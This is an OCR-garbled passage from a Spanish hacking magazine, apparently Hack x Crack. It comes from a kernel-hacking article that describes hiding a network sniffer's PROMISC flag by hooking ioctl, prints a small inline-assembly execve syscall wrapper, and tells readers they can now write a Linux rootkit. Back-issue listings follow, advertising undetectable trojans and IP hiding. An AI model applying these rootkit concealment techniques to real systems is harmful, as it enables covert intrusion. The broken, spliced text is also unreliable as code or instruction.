Si en el nmero 26 de la revista ya mencionbamos que un sniffer se poda esconder muy pero que muy bien era por algo... resulta que podemos cambiar los flags de una tarjeta de red y ocultar ese "PROMISC" delatador mediante la syscall "SYS_ioctl", se pueden hacer otras muchas cosas con eso si pensamos en lo que hace "ioctl()" que es controlar dispositivos

Qu hacemos al abrir un fichero? ...Usar "getdents()", y para mirar los procesos mapeados en /proc? ...Usar

65/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

La verdad es que no slo es vlido para execve sino tam bin para otras funciones, pero no es el momento existen macrointrusiones para funciones con menos par metros y para ms de tres parmetros... es cuestin de usar la que necesites si necesitas inspiracin srvete de unistd.h.

//---------------------- mi_execve -------------------int mi_execve ( c o n s t c h a r * f i l e n , c h a r * c o n s t a rg v [ ] , c h a r * c o n s t e n v p [ ] ) { int errno; long __res; __asm__ volatile ("int $0x80" \ : "=a" (__res) \ : "0" (__NR_mi_execve),"b" ((long)(filen)),\ "c" ((long)(argv)), \ "d" ((long)(envp))); \ __syscall_return(long,__res); \ } } //--------------- final mi_execve -------------------

Como ves, las aplicaciones que tiene hackear el Kernel son varias desde el punto de vista de la seguridad y es que lo mismo podemos demoler la seguridad de un sistema tro yanizando absolutamente todo el sistema como dotar al entorno de habilidades especiales para controlar al milme tro todo lo que sucede y poder hacer un seguimiento ex haustivo de las acciones de un atacante.

Bueno jeje, ahora ya tienes los conocimientos necesarios para hacer un rootkit y atacar sistemas Linux justo al ncleo, de la proteccin hablaremos cuando llegue el mo mento, tiempo al tiempo, no te pierdas los prximos nmeros seguro que te gustarn.

66/68

TU EN YA

!!! CO OS UI Q

NMERO1: -CREA TU PRIMER TROYANO INDETECTABLE POR LOS ANTIVIRUS. -FLASHFXP: SIN LMITE DE VELOCIDAD. -FTP SIN SECRETOS: PASVMODE. -PORT MODE/PASV MODE Y LOS FIREWALL: LA UTILIDAD DE LO APRENDIDO. -TCP-IP:INICIACIN (PARTE 1). -EL MEJOR GRUPO DE SERVIDORES FTP DE HABLA HISPANA. -EDONKEY 2000 Y SPANISHARE. -LA FLECHA CIDA.

NMERO 2: -CODE/DECODE BUG: INTRODUCCIN. -CODE/DECODE BUG: LOCALIZACIN DEL OBJETIVO. -CODE/DECODE BUG: LNEA DE COMANDOS. -CODE/DECODE BUG: SUBIENDO ARCHIVOS AL SERVIDOR REMOTO. -OCULTACIN DE IP: PRIMEROS PASOS. -LA FLECHA CIDA: LA SS DIGITAL. AZNAR AL FRENTE DE LA SS DEL SIGLO XXI.

NMERO 3: -PROXY: OCULTANDO NUESTRA IP. ASUMIENDO CONCEPTOS. -PROXY: OCULTANDO NUESTRA IP. ENCADENANDO PROXIES. -PROXY: OCULTANDO NUESTRA IP. OCULTANDO TODOS NUESTROS PROGRAMAS TRAS LAS CADENAS DE PROXIES. -EL SERVIDOR DE HACKXCRACK: CONFIGURACIN Y MODO DE EMPLEO. -SALA DE PRACTICAS: EXPLICACIN. -PRCTICA 1: SUBIENDO UN ARCHIVO A NUESTRO SERVIDOR. -PRCTICA 2: MONTANDO UN DUMP CON EL SERV-U. -PRCTICA 3: CODE/DECODE BUG. LNEA DE COMANDOS. -PREGUNTAS Y DUDAS.

NMERO 7: - PROTOCOLOS: POP3 - PASA TUS PELICULAS A DIVX III (EL AUDIO) - PASA TUS PELICULAS A DIVX IV (MULTIPLEXADO) - CURSO DE VISUAL BASIC: LA CALCULADORA - IPHXC: EL TERCER TROYANO DE HXC II - APACHE: UN SERVIDOR WEB EN NUESTRO PC - CCPROXY: IV TROYANO DE PC PASO A PASO - TRASTEANDO CON EL HARDWARE DE UNA LAN